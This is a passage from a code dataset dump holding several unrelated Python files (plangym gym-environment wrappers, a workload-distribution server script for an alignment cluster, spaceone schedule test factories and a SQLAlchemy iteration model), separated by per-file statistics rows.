Return a numpy array containing the rendered view of the environment.
Square matrices are interpreted as a greyscale image. Three-dimensional arrays
are interpreted as RGB images with channels (Height, Width, RGB)
"""
return None
def clone(self) -> "BaseEnvironment":
"""Return a copy of the environment."""
raise NotImplementedError()
class PlanEnvironment(BaseEnvironment):
"""Base class for implementing OpenAI ``gym`` environments in ``plangym``."""
def __init__(
self,
name: str,
frameskip: int = 1,
episodic_live: bool = False,
autoreset: bool = True,
wrappers: Iterable[wrap_callable] = None,
delay_init: bool = False,
remove_time_limit=True,
):
"""
Initialize a :class:`PlanEnvironment`.
Args:
name: Name of the environment. Follows standard gym syntax conventions.
frameskip: Number of times an action will be applied for each ``dt``.
episodic_live: Return ``end = True`` when losing a life.
autoreset: Automatically reset the environment when the OpenAI environment
returns ``end = True``.
wrappers: Wrappers that will be applied to the underlying OpenAI env. \
Every element of the iterable can be either a :class:`gym.Wrapper` \
or a tuple containing ``(gym.Wrapper, kwargs)``.
delay_init: If ``True`` do not initialize the ``gym.Environment`` \
and wait for ``init_env`` to be called later.
remove_time_limit: If True, remove the time limit from the environment.
"""
self._gym_env = None
self.episodic_life = episodic_live
self.remove_time_limit = remove_time_limit
self._wrappers = wrappers
super(PlanEnvironment, self).__init__(
name=name,
frameskip=frameskip,
autoreset=autoreset,
delay_init=delay_init,
)
@property
def gym_env(self):
"""Return the instance of the environment that is being wrapped by plangym."""
if self._gym_env is None and not self.SINGLETON:
self.init_env()
return self._gym_env
@property
def obs_shape(self) -> Tuple[int, ...]:
"""Tuple containing the shape of the observations returned by the Environment."""
return self.observation_space.shape
@property
def action_shape(self) -> Tuple[int, ...]:
"""Tuple containing the shape of the actions applied to the Environment."""
return self.action_space.shape
@property
def action_space(self) -> Space:
"""Return the action_space of the environment."""
return self.gym_env.action_space
@property
def observation_space(self) -> Space:
"""Return the observation_space of the environment."""
return self.gym_env.observation_space
@property
def reward_range(self):
"""Return the reward_range of the environment."""
if hasattr(self.gym_env, "reward_range"):
return self.gym_env.reward_range
@property
def metadata(self):
"""Return the metadata of the environment."""
if hasattr(self.gym_env, "metadata"):
return self.gym_env.metadata
def init_env(self):
"""Initialize the target :class:`gym.Env` instance."""
self._gym_env = self.init_gym_env()
if self._wrappers is not None:
self.apply_wrappers(self._wrappers)
def get_image(self) -> np.ndarray:
"""
Return a numpy array containing the rendered view of the environment.
Square matrices are interpreted as a greyscale image. Three-dimensional arrays
are interpreted as RGB images with channels (Height, Width, RGB)
"""
if hasattr(self.gym_env, "render"):
return self.gym_env.render(mode="rgb_array")
def reset(
self,
return_state: bool = True,
) -> Union[numpy.ndarray, Tuple[numpy.ndarray, numpy.ndarray]]:
"""
Restart the environment.
Args:
return_state: If ``True`` it will return the state of the environment.
Returns:
``(state, obs)`` if ``return_state`` is ``True``, else ``obs``.
"""
if self.gym_env is None and self.delay_init:
self.init_env()
obs = self.gym_env.reset()
return (self.get_state(), obs) if return_state else obs
def step_with_dt(self, action: Union[numpy.ndarray, int, float], dt: int = 1):
"""
Take ``dt`` simulation steps and make the environment evolve in multiples\
of ``self.frameskip`` for a total of ``dt`` * ``self.frameskip`` steps.
Args:
action: Chosen action applied to the environment.
dt: Consecutive number of times that the action will be applied.
Returns:
if state is None returns ``(observs, reward, terminal, info)``
else returns ``(new_state, observs, reward, terminal, info)``
"""
reward = 0
obs, lost_live, terminal, oob = None, False, False, False
info = {"lives": -1}
n_steps = 0
for _ in range(int(dt)):
for _ in range(self.frameskip):
obs, _reward, _oob, _info = self.gym_env.step(action)
_info["lives"] = self.get_lives_from_info(_info)
lost_live = info["lives"] > _info["lives"] or lost_live
oob = oob or _oob
custom_terminal = self.custom_terminal_condition(info, _info, _oob)
terminal = terminal or oob or custom_terminal
terminal = (terminal or lost_live) if self.episodic_life else terminal
info = _info.copy()
reward += _reward
n_steps += 1
if terminal:
break
if terminal:
break
# This allows getting the original values even when using an episodic life environment
info["terminal"] = terminal
info["lost_live"] = lost_live
info["oob"] = oob
info["win"] = self.get_win_condition(info)
info["n_steps"] = n_steps
return obs, reward, terminal, info
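# Worked example of the loop above: with ``frameskip=4`` and ``dt=3`` the wrapped
# gym environment is stepped up to 12 times (fewer if a terminal state is reached),
# and the rewards of all raw steps are accumulated into a single return value.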
def sample_action(self) -> Union[int, np.ndarray]:
"""Return a valid action that can be used to step the Environment chosen at random."""
if hasattr(self.action_space, "sample"):
return self.action_space.sample()
def clone(self) -> "PlanEnvironment":
"""Return a copy of the environment."""
return self.__class__(
name=self.name,
frameskip=self.frameskip,
wrappers=self._wrappers,
episodic_live=self.episodic_life,
autoreset=self.autoreset,
delay_init=self.delay_init,
)
def close(self):
"""Close the underlying :class:`gym.Env`."""
if hasattr(self, "_gym_env") and hasattr(self._gym_env, "close"):
return self._gym_env.close()
def init_gym_env(self) -> gym.Env:
"""Initialize the :class:`gym.Env`` instance that the current class is wrapping."""
# Remove any undocumented wrappers
spec = gym_registry.spec(self.name)
if self.remove_time_limit:
if hasattr(spec, "max_episode_steps"):
spec._max_episode_steps = spec.max_episode_steps
if hasattr(spec, "max_episode_time"):
spec._max_episode_time = spec.max_episode_time
spec.max_episode_steps = None
spec.max_episode_time = None
gym_env: gym.Env = spec.make()
gym_env.reset()
return gym_env
def seed(self, seed=None):
"""Seed the underlying :class:`gym.Env`."""
if hasattr(self.gym_env, "seed"):
return self.gym_env.seed(seed)
def apply_wrappers(self, wrappers: Iterable[wrap_callable]):
"""Wrap the underlying OpenAI gym environment."""
for item in wrappers:
if isinstance(item, tuple):
wrapper, kwargs = item
self.wrap(wrapper, **kwargs)
else:
self.wrap(item)
def wrap(self, wrapper: Callable, *args, **kwargs):
"""Apply a single OpenAI gym wrapper to the environment."""
self._gym_env = wrapper(self.gym_env, *args, **kwargs)
@staticmethod
def get_lives_from_info(info: Dict[str, Any]) -> int:
"""Return the number of lives remaining in the current game."""
return info.get("lives", -1)
@staticmethod
def get_win_condition(info: Dict[str, Any]) -> bool:
"""Return ``True`` if the current state corresponds to winning the game."""
return False
@staticmethod
def custom_terminal_condition(old_info, new_info, oob) -> bool:
"""Calculate a new terminal condition using the info data."""
return False
def render(self, mode=None):
"""Render the environment using OpenGL. This wraps the OpenAI render method."""
if hasattr(self.gym_env, "render"):
return self.gym_env.render(mode=mode)
class VideogameEnvironment(PlanEnvironment):
"""Common interface for working with video games that run using an emulator."""
def __init__(
self,
name: str,
frameskip: int = 5,
episodic_live: bool = False,
autoreset: bool = True,
delay_init: bool = False,
remove_time_limit: bool = True,
obs_type: str = "rgb", # ram | rgb | grayscale
mode: int = 0, # game mode, see Machado et al. 2018
difficulty: int = 0, # game difficulty, see Machado et al. 2018
repeat_action_probability: float = 0.0, # Sticky action probability
full_action_space: bool = False, # Use all actions
render_mode: Optional[str] = None, # None | human | rgb_array
possible_to_win: bool = False,
wrappers: Iterable[wrap_callable] = None,
):
"""
Initialize a :class:`VideogameEnvironment`.
Args:
name: Name of the environment. Follows standard gym syntax conventions.
frameskip: Number of times an action will be applied for each step
in dt.
episodic_live: Return ``end = True`` when losing a life.
autoreset: Restart environment when reaching a terminal state.
delay_init: If ``True`` do not initialize the ``gym.Environment``
and wait for ``init_env`` to be called later.
remove_time_limit: If True, remove the time limit from the environment.
obs_type: One of {"rgb", "ram", "grayscale"}.
mode: Integer or string indicating the game mode, when available.
difficulty: Difficulty level of the game, when available.
repeat_action_probability: Repeat the last action with this probability.
full_action_space: Whether to use the full range of possible actions
or only those available in the game.
render_mode: One of {None, "human", "rgb_array"}.
possible_to_win: It is possible to finish the Atari game without
getting a terminal state that is not out of bounds
or does not involve losing a life.
wrappers: Wrappers that will be applied to the underlying OpenAI env.
Every element of the iterable can be either a :class:`gym.Wrapper`
or a tuple containing ``(gym.Wrapper, kwargs)``.
"""
self._remove_time_limit = remove_time_limit
self.possible_to_win = possible_to_win
self._obs_type = obs_type
self._mode = mode
self._difficulty = difficulty
self._repeat_action_probability = repeat_action_probability
self._full_action_space = full_action_space
self._render_mode = render_mode
super(VideogameEnvironment, self).__init__(
name=name,
frameskip=frameskip,
episodic_live=episodic_live,
autoreset=autoreset,
wrappers=wrappers,
delay_init=delay_init,
)
@property
def obs_type(self) -> str:
"""Return the type of observation returned by the environment."""
return self._obs_type
@property
def mode(self) -> int:
"""Return the selected game mode for the current environment."""
return self._mode
@property
def difficulty(self) -> int:
"""Return the selected difficulty for the current environment."""
return self._difficulty
@property
def repeat_action_probability(self) -> float:
"""Probability of repeating the same action after input."""
return self._repeat_action_probability
@property
def full_action_space(self) -> bool:
"""If True the action space correspond to all possible actions in the Atari emulator."""
return self._full_action_space
@property
def render_mode(self) -> str:
"""Return how the game will be rendered. Values: None | human | rgb_array."""
return self._render_mode
@property
def has_time_limit(self) -> bool:
"""Return True if the Environment can only be stepped for a limited number of times."""
return self._remove_time_limit
@property
def n_actions(self) -> int:
"""Return the number of actions available."""
return self.gym_env.action_space.n
def clone(self, **kwargs) -> "VideogameEnvironment":
"""Return a copy of the environment."""
params = dict(
name=self.name,
frameskip=self.frameskip,
wrappers=self._wrappers,
episodic_live=self.episodic_life,
autoreset=self.autoreset,
delay_init=self.delay_init,
possible_to_win=self.possible_to_win,
clone_seeds=self.clone_seeds,
mode=self.mode,
difficulty=self.difficulty,
obs_type=self.obs_type,
repeat_action_probability=self.repeat_action_probability,
full_action_space=self.full_action_space,
render_mode=self.render_mode,
remove_time_limit=self._remove_time_limit,
)
params.update(**kwargs)
return self.__class__(**params)
def get_ram(self) -> np.ndarray:
"""Return the ram of the emulator as a numpy array."""
raise NotImplementedError()
class VectorizedEnvironment(BaseEnvironment, ABC):
"""
Base class that defines the API for working with vectorized environments.
A vectorized environment allows stepping several copies of the environment in parallel
when calling ``step_batch``.
It creates a local copy of the environment that is the target of all the other
methods of :class:`BaseEnvironment`. In practice, a :class:`VectorizedEnvironment`
acts as a wrapper of an environment initialized with the provided parameters when calling
__init__.
"""
def __init__(
self,
env_class,
name: str,
frameskip: int = 1,
autoreset: bool = True,
delay_init: bool = False,
n_workers: int = 8,
**kwargs,
):
"""
Initialize a :class:`VectorizedEnvironment`.
Args:
env_class: Class of the environment to be wrapped.
name: Name of the environment.
frameskip: Number of times ``step`` will be called with the same action.
autoreset: Ignored. Always set to True. Automatically reset the environment
when the OpenAI environment returns ``end = True``.
delay_init: If ``True`` do not initialize the ``gym.Environment`` \
and wait for ``init_env`` to be called later.
env_callable: Callable that returns an instance of the environment \
that will be parallelized.
n_workers: Number of workers that will be used to step the env.
**kwargs: Additional keyword arguments passed to env_class.__init__.
"""
self._n_workers = n_workers
self._env_class = env_class
self._env_kwargs = kwargs
self._plangym_env = None
self.SINGLETON = env_class.SINGLETON if hasattr(env_class, "SINGLETON") else False
self.RETURNS_GYM_TUPLE = (
env_class.RETURNS_GYM_TUPLE if hasattr(env_class, "RETURNS_GYM_TUPLE") else True
)
self.STATE_IS_ARRAY = (
env_class.STATE_IS_ARRAY if hasattr(env_class, "STATE_IS_ARRAY") else True
)
super(VectorizedEnvironment, self).__init__(
name=name,
frameskip=frameskip,
autoreset=autoreset,
delay_init=delay_init,
)
@property
def n_workers(self) -> int:
"""Return the number of parallel processes that run ``step_batch`` in parallel."""
return self._n_workers
@property
def plangym_env(self) -> BaseEnvironment:
"""Environment that is wrapped by the current instance."""
return self._plangym_env
@property
def obs_shape(self) -> Tuple[int]:
"""Tuple containing the shape of the observations returned by the Environment."""
return self.plangym_env.obs_shape
@property
def action_shape(self) -> Tuple[int]:
"""Tuple containing the shape of the actions applied to the Environment."""
return self.plangym_env.action_shape
@property
def gym_env(self):
"""Return the instance of the environment that is being wrapped by plangym."""
try:
return self.plangym_env.gym_env
except AttributeError:
return
def __getattr__(self, item):
"""Forward attributes to the wrapped environment."""
return getattr(self.plangym_env, item)
@staticmethod
def split_similar_chunks(
vector: Union[list, numpy.ndarray],
n_chunks: int,
) -> Generator[Union[list, numpy.ndarray], None, None]:
"""
Split an indexable object into similar chunks.
Args:
vector: Target indexable object to be split.
n_chunks: Number of similar chunks.
Returns:
Generator that returns the chunks created after splitting the target object.
"""
chunk_size = int(numpy.ceil(len(vector) / n_chunks))
for i in range(0, len(vector), chunk_size):
yield vector[i : i + chunk_size]
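# Example: split_similar_chunks(list(range(10)), n_chunks=3) uses
# chunk_size = ceil(10 / 3) = 4 and yields [0, 1, 2, 3], [4, 5, 6, 7], [8, 9].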
@classmethod
def batch_step_data(cls, actions, states, dt, batch_size):
"""Make batches of step data to distribute across workers."""
no_states = states is None or states[0] is None
states = [None] * len(actions) if no_states else states
dt = dt if isinstance(dt, numpy.ndarray) else numpy.ones(len(states), dtype=int) * dt
states_chunks = cls.split_similar_chunks(states, n_chunks=batch_size)
actions_chunks = cls.split_similar_chunks(actions, n_chunks=batch_size)
dt_chunks = cls.split_similar_chunks(dt, n_chunks=batch_size)
return states_chunks, actions_chunks, dt_chunks
def create_env_callable(self, **kwargs) -> Callable[..., BaseEnvironment]:
"""Return a callable that initializes the environment that is being vectorized."""
def create_env_callable(env_class, **env_kwargs):
def _inner(**inner_kwargs):
env_kwargs.update(inner_kwargs)
return env_class(**env_kwargs)
return _inner
callable_kwargs = dict(
env_class=self._env_class,
name=self.name,
frameskip=self.frameskip,
delay_init=self._env_class.SINGLETON,
**self._env_kwargs,
)
callable_kwargs.update(kwargs)
return create_env_callable(**callable_kwargs)
def init_env(self) -> None:
"""Initialize the target environment with the parameters provided at __init__."""
self._plangym_env: BaseEnvironment = self.create_env_callable()()
self._plangym_env.init_env()
def step(self, action: numpy.ndarray, state: numpy.ndarray = None, dt: int = 1):
"""
Step the environment applying a given action from an arbitrary state.
If ``state`` is not provided the signature matches the one from OpenAI gym. It allows \
applying arbitrary boundary conditions to define custom end states in case \
the env was initialized with a ``CustomDeath`` object.
Args:
action: Array containing the action to be applied.
state: State to be set before stepping the environment.
dt: Consecutive number of times to apply the given action.
Returns:
if state is None returns ``(observs, rewards, ends, infos)`` else \
``(new_states, observs, rewards, ends, infos)``.
"""
return self.plangym_env.step(action=action, state=state, dt=dt)
def reset(self, return_state: bool = True):
"""
Reset the environment and return the first observation, or the first \
``(state, obs)`` tuple.
Args:
return_state: If ``True`` also return the initial state of the env.
Returns:
Observation of the environment if `return_state` is False. Otherwise,
return (state, obs) after reset.
"""
state, obs = self.plangym_env.reset(return_state=True)
self.sync_states(state)
return (state, obs) if return_state else obs
def get_state(self):
"""
Recover the internal state of the simulation.
A state completely describes the Environment at a given moment.
Returns:
State of the simulation.
"""
return self.plangym_env.get_state()
def set_state(self, state):
"""
Set the internal state of the simulation.
Args:
state: Target state to be set in the environment.
"""
self.plangym_env.set_state(state)
self.sync_states(state)
def render(self, mode="human"):
"""Render the environment using OpenGL. This wraps the OpenAI render method."""
return self.plangym_env.render(mode)
def get_image(self) -> np.ndarray:
"""
Return a numpy array containing the rendered view of the environment.
Square matrices are interpreted as a greyscale image. Three-dimensional arrays
are interpreted as RGB images with channels (Height, Width, RGB)
"""
return self.plangym_env.get_image()
def step_with_dt(self, action: Union[numpy.ndarray, int, float], dt: int = 1) -> tuple:
"""
Take ``dt`` simulation steps and make the environment evolve in multiples\
of ``self.frameskip`` for a total of ``dt`` * ``self.frameskip`` steps.
Args:
action: Chosen action applied to the environment.
dt: Consecutive number of times that the action will be applied.
Returns:
If state is None returns ``(observs, reward, terminal, info)``
else returns ``(new_state, observs, reward, terminal, info)``
"""
return self.plangym_env.step_with_dt(action=action, dt=dt)
def sample_action(self):
"""
Return a valid action that can be used to step the Environment.
Implementing this method is optional, and it's only intended to make the
testing process of the Environment easier.
"""
return self.plangym_env.sample_action()
def sync_states(self, state: None):
"""
Synchronize the workers' states with the state of ``self.gym_env``.
Set all the states of the different workers of the internal :class:`BatchEnv`\
to the same state as the internal :class:`Environment` used to apply the\
non-vectorized steps.
"""
raise NotImplementedError()
def step_batch(
self,
actions: numpy.ndarray,
states: numpy.ndarray = None,
dt: Union[numpy.ndarray, int] = 1,
):
"""
Vectorized version of the ``step`` method.
It allows stepping a vector of states and actions. The signature and \
behaviour are the same as ``step``, but taking a list of states, actions \
and dts as input.
Args:
actions: Iterable containing the different actions to be applied.
states: Iterable containing the different states to be set.
dt: int or array containing the frameskips that will be applied.
Returns:
if states is None returns ``(observs, rewards, ends, infos)`` else \
``(new_states, observs, rewards, ends, infos)``
"""
raise NotImplementedError()
def clone(self, **kwargs) -> "BaseEnvironment":
"""Return a copy of the environment."""
self_kwargs = dict(
name=self.name,
frameskip=self.frameskip,
delay_init=self.delay_init,
env_class=self._env_class,
n_workers=self.n_workers,
**self._env_kwargs,
)
self_kwargs.update(kwargs)
env = self.__class__(**self_kwargs)
return env
| 36.574635
| 99
| 0.613232
| 3,925
| 32,588
| 4.952866
| 0.102166
| 0.049691
| 0.022222
| 0.00823
| 0.494136
| 0.434465
| 0.410185
| 0.376029
| 0.356584
| 0.34784
| 0
| 0.001401
| 0.29919
| 32,588
| 890
| 100
| 36.61573
| 0.849812
| 0.419878
| 0
| 0.354839
| 0
| 0
| 0.016653
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.172811
| false
| 0.006912
| 0.016129
| 0
| 0.327189
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
5f890b9328d6983928b109fecc583fe7148f59dc
| 6,426
|
py
|
Python
|
L2.py
|
coka28/AlignmentCluster
|
11a4e5fc578258bd3a2181a13bdaa60346eca8da
|
[
"MIT"
] | null | null | null |
L2.py
|
coka28/AlignmentCluster
|
11a4e5fc578258bd3a2181a13bdaa60346eca8da
|
[
"MIT"
] | null | null | null |
L2.py
|
coka28/AlignmentCluster
|
11a4e5fc578258bd3a2181a13bdaa60346eca8da
|
[
"MIT"
] | null | null | null |
# Layer 2 server script
# project worker
'''-.
+#_pü'-.....
ö*+...:(loop):..............................................
m}°: \
€>!: 1. register clients \
&w^: 2. distribute WLs and add them to pending \
j/6: 3. move results to results dir \
@²%: 4. remove timed-out from pending and re-open them :§
#ß$: 5. check if done /
6@y: 6. backup and call htmlUpdate /
µ<§: /
%$":......................................................../
%&"$%!§.-´´´´
€$"!.-´
'''
import sys, os, pickle, shutil, htmlTool
from time import time, sleep
os.chdir(os.path.expanduser("~"))
project = sys.argv[-1]
projDir = f'apps/aligner/projects/{project}'
clientsDir = f'{projDir}/clients'
regDir = f'{projDir}/registrations'
backupDir = f'{projDir}/backup'
resDir = f'{projDir}/results'
def registerClient(ID):
print(f'{project}: \tregistering new client with ID {ID}')
os.mkdir(f'{clientsDir}/{ID}')
os.mkdir(f'{clientsDir}/{ID}/res')
os.mkdir(f'{clientsDir}/{ID}/res/done')
with open(f'{clientsDir}/{ID}/res/done/done','wb') as doneFile:
pickle.dump(0,doneFile)
def passWLs():
global openWLs, pendingWLs
clients = os.listdir(clientsDir)
# iterate over a copy so that removing inactive clients does not skip entries
for n in list(clients):
if os.path.exists(f'{clientsDir}/{n}/inactive'):
clients.remove(n)
for n in clients:
if os.path.exists(f'{clientsDir}/{n}/WL'):
if time()-os.path.getmtime(f'{clientsDir}/{n}/WL') > 3600:
print(f'{project}: \tclient {n} did not retrieve their workload... reassigning and setting to inactive')
wl = pickle.load(open(f'{clientsDir}/{n}/WL','rb'))
os.remove(f'{clientsDir}/{n}/WL')
for w in wl:
if w in pendingWLs:
i = pendingWLs.index(w)
del(pendingWLs[i])
del(assignmentTimes[i])
openWLs.insert(0,w)
with open(f'{clientsDir}/{n}/inactive','w') as tmp: pass
else:
tmp = min(min(128, int(len(openWLs)/len(clients))*4+1),len(openWLs))
if tmp > 0: print(f'{project}: \tassigned {tmp} workloads to client {n}')
wl = [openWLs.pop(0) for i in range(tmp)]
with open(f'{clientsDir}/{n}/WL_tmp','wb') as tmp:
pickle.dump(wl,tmp)
for i in wl:
pendingWLs.append(i)
assignmentTimes.append(time())
os.rename(f'{clientsDir}/{n}/WL_tmp',f'{clientsDir}/{n}/WL')
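# Worked example of the batch size formula above: with 1000 open workloads and
# 2 active clients, min(min(128, int(1000/2)*4+1), 1000) caps the hand-out at 128
# workloads per client; with only 3 open workloads it simply hands out all 3.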
def moveResults():
clientDirs = os.listdir(clientsDir)
stored = 0
for n in clientDirs:
resFiles = os.listdir(f'{clientsDir}/{n}/res')
resFiles.remove('done')
with open(f'{clientsDir}/{n}/res/done/done','rb') as doneFile:
doneWLs = pickle.load(doneFile)
for m in resFiles:
if os.path.getsize(f'{clientsDir}/{n}/res/'+m) == 0 and time()-os.path.getmtime(f'{clientsDir}/{n}/res/'+m)<60:
pass
else:
resIndex = int(m[m.find('.')+1:])
if resIndex in pendingWLs:
i = pendingWLs.index(resIndex)
alList = open(f'{clientsDir}/{n}/res/{m}','r').read().split('\n\n')
alList = [i for i in alList if i!='']
alignments = []
for al in alList:
tmp = al.split('\n')
tmp = [tuple(int(k) for k in tmp[j].split(';') if tmp[j]!='')
for j in range(len(tmp))]
alignments.append(tmp)
doneWLs += 1
with open(resDir+'/'+str(resIndex),'wb') as tmp:
pickle.dump(alignments,tmp)
os.remove(f'{clientsDir}/{n}/res/{m}')
# shutil.move(f'{clientsDir}/{n}/res/{m}',f'{resDir}/{m}')
stored += 1
del(pendingWLs[i])
del(assignmentTimes[i])
else:
os.remove(f'{clientsDir}/{n}/res/{m}')
with open(f'{clientsDir}/{n}/res/done/done','wb') as doneFile:
pickle.dump(doneWLs,doneFile)
if stored > 0: print(f'{project}: \tstored {stored} alignment parts in /results')
def reopen():
reNr = 0
for i in range(len(pendingWLs)-1,-1,-1):
if time()-assignmentTimes[i] > 1800:
openWLs.insert(0,pendingWLs[i])
del(pendingWLs[i])
del(assignmentTimes[i])
reNr += 1
if reNr > 0: print(f'{project}: \treopened {reNr} timed-out workloads')
def checkDone():
if len(pendingWLs) + len(openWLs) == 0:
print(f'{project}: \tproject finished')
return True
else: return False
def backup():
with open(f'{backupDir}/openWLs','w+b') as tmp:
pickle.dump(openWLs,tmp)
with open(f'{backupDir}/pendingWLs','w+b') as tmp:
pickle.dump(pendingWLs,tmp)
with open(f'{backupDir}/assignmentTimes','w+b') as tmp:
pickle.dump(assignmentTimes,tmp)
print(f'{project}: \tcreated backup')
# load from backup
with open(f'{backupDir}/openWLs','rb') as tmp:
openWLs = pickle.load(tmp)
with open(f'{backupDir}/pendingWLs','rb') as tmp:
pendingWLs = pickle.load(tmp)
with open(f'{backupDir}/assignmentTimes','rb') as tmp:
assignmentTimes = pickle.load(tmp)
print(f'{project}: \tretrieved data from project backup (open: {len(openWLs)}; pending: {len(pendingWLs)})')
backup_counter = 0
done = False
while not done:
# 1.
for ID in os.listdir(regDir):
registerClient(ID)
os.remove(f'{regDir}/{ID}')
# 2.
passWLs()
# 3.
moveResults()
# 4.
reopen()
# 5.
if checkDone(): done = True
# 6.
if backup_counter == 100 or done:
backup()
try: htmlTool.update()
except: pass
backup_counter = 0
if done:
os.rename(projDir,f'{projDir}__done__')
backup_counter += 1
sleep(1.74)
| 36.931034
| 124
| 0.495331
| 755
| 6,426
| 4.215894
| 0.223841
| 0.076029
| 0.067861
| 0.042413
| 0.325479
| 0.231543
| 0.114672
| 0.061263
| 0.024505
| 0.024505
| 0
| 0.01384
| 0.336601
| 6,426
| 173
| 125
| 37.144509
| 0.730237
| 0.123561
| 0
| 0.117188
| 0
| 0.007813
| 0.228887
| 0.091996
| 0
| 0
| 0
| 0
| 0
| 1
| 0.046875
| false
| 0.039063
| 0.015625
| 0
| 0.070313
| 0.0625
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
5f8a8dc4b802b22d26a8494296192bb50d7f2d9a
| 2,677
|
py
|
Python
|
test/factory/schedule_factory.py
|
choonho/statistics
|
31fbae2d0772a2e8b717ac12c8de9edd9d8f1734
|
[
"Apache-2.0"
] | null | null | null |
test/factory/schedule_factory.py
|
choonho/statistics
|
31fbae2d0772a2e8b717ac12c8de9edd9d8f1734
|
[
"Apache-2.0"
] | null | null | null |
test/factory/schedule_factory.py
|
choonho/statistics
|
31fbae2d0772a2e8b717ac12c8de9edd9d8f1734
|
[
"Apache-2.0"
] | null | null | null |
import factory
from spaceone.core import utils
from spaceone.statistics.model.schedule_model import Schedule, Scheduled, JoinQuery, Formula, QueryOption
class ScheduledFactory(factory.mongoengine.MongoEngineFactory):
class Meta:
model = Scheduled
cron = '*/5 * * * *'
interval = 5
minutes = [0, 10, 20, 30, 40, 50]
hours = [0, 6, 12, 18]
class JoinQueryFactory(factory.mongoengine.MongoEngineFactory):
class Meta:
model = JoinQuery
keys = ['project_id']
type = 'LEFT'
data_source_id = factory.LazyAttribute(lambda o: utils.generate_id('ds'))
resource_type = 'inventory.Server'
query = {
'aggregate': {
'group': {
'keys': [{
'key': 'project_id',
'name': 'project_id'
}],
'fields': [{
'operator': 'count',
'name': 'server_count'
}]
}
}
}
class FormulaFactory(factory.mongoengine.MongoEngineFactory):
class Meta:
model = Formula
name = factory.LazyAttribute(lambda o: utils.random_string())
formula = 'a + (b / c)'
class QueryOptionFactory(factory.mongoengine.MongoEngineFactory):
class Meta:
model = QueryOption
data_source_id = factory.LazyAttribute(lambda o: utils.generate_id('ds'))
resource_type = 'identity.Project'
query = {
'aggregate': {
'group': {
'keys': [{
'key': 'project_id',
'name': 'project_id'
}, {
'key': 'name',
'name': 'project_name'
}, {
'key': 'project_group.name',
'name': 'project_group_name'
}],
}
},
'sort': {
'name': 'resource_count',
'desc': True
},
'page': {
'limit': 5
}
}
join = factory.List([factory.SubFactory(JoinQueryFactory)])
formulas = factory.List([factory.SubFactory(FormulaFactory)])
class ScheduleFactory(factory.mongoengine.MongoEngineFactory):
class Meta:
model = Schedule
schedule_id = factory.LazyAttribute(lambda o: utils.generate_id('schedule'))
topic = factory.LazyAttribute(lambda o: utils.random_string())
state = 'ENABLED'
options = factory.SubFactory(QueryOptionFactory)
schedule = factory.SubFactory(ScheduledFactory)
tags = {
'key': 'value'
}
domain_id = utils.generate_id('domain')
created_at = factory.Faker('date_time')
last_scheduled_at = None
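# Minimal usage sketch (assumption: a test suite with an active mongoengine
# connection, e.g. mongomock). Calling the factory builds and saves a Schedule
# document; keyword arguments override the defaults declared above:
#     schedule = ScheduleFactory(domain_id='domain-12345', state='DISABLED')
#     schedule_unsaved = ScheduleFactory.build()  # build without saving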
| 26.245098
| 105
| 0.548001
| 234
| 2,677
| 6.141026
| 0.376068
| 0.06263
| 0.125261
| 0.142658
| 0.427279
| 0.427279
| 0.253306
| 0.192067
| 0.161447
| 0.161447
| 0
| 0.011186
| 0.332088
| 2,677
| 101
| 106
| 26.504951
| 0.792506
| 0
| 0
| 0.2875
| 0
| 0
| 0.125514
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.0375
| 0
| 0.475
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
5f9164c1cc7e9494a573895e93fd39680b8520f6
| 1,324
|
py
|
Python
|
ymir/backend/src/ymir_app/app/models/iteration.py
|
Zhang-SJ930104/ymir
|
dd6481be6f229ade4cf8fba64ef44a15357430c4
|
[
"Apache-2.0"
] | null | null | null |
ymir/backend/src/ymir_app/app/models/iteration.py
|
Zhang-SJ930104/ymir
|
dd6481be6f229ade4cf8fba64ef44a15357430c4
|
[
"Apache-2.0"
] | 1
|
2022-01-18T09:28:29.000Z
|
2022-01-18T09:28:29.000Z
|
ymir/backend/src/ymir_app/app/models/iteration.py
|
Aryalfrat/ymir
|
d4617ed00ef67a77ab4e1944763f608bface4be6
|
[
"Apache-2.0"
] | null | null | null |
from datetime import datetime
from sqlalchemy import Boolean, Column, DateTime, Integer, SmallInteger, String
from app.config import settings
from app.db.base_class import Base
from app.models.task import Task # noqa
class Iteration(Base):
__tablename__ = "iteration"
id = Column(Integer, primary_key=True, index=True, autoincrement=True)
description = Column(String(settings.STRING_LEN_LIMIT))
iteration_round = Column(Integer, index=True, nullable=False)
current_stage = Column(SmallInteger, index=True, default=0, nullable=False)
previous_iteration = Column(Integer, index=True, default=0, nullable=False)
mining_input_dataset_id = Column(Integer)
mining_output_dataset_id = Column(Integer)
label_output_dataset_id = Column(Integer)
training_input_dataset_id = Column(Integer)
training_output_model_id = Column(Integer)
testing_dataset_id = Column(Integer)
user_id = Column(Integer, index=True, nullable=False)
project_id = Column(Integer, index=True, nullable=False)
is_deleted = Column(Boolean, default=False, nullable=False)
create_datetime = Column(DateTime, default=datetime.utcnow, nullable=False)
update_datetime = Column(
DateTime,
default=datetime.utcnow,
onupdate=datetime.utcnow,
nullable=False,
)
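# Minimal usage sketch (assumption: an existing SQLAlchemy session bound to the
# app database; values below are made up):
#     iteration = Iteration(iteration_round=1, user_id=1, project_id=1)
#     session.add(iteration)
#     session.commit()  # create_datetime/update_datetime default to utcnow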
| 36.777778
| 79
| 0.749245
| 162
| 1,324
| 5.919753
| 0.32716
| 0.149114
| 0.140772
| 0.114703
| 0.397289
| 0.265902
| 0.077164
| 0
| 0
| 0
| 0
| 0.001805
| 0.163142
| 1,324
| 35
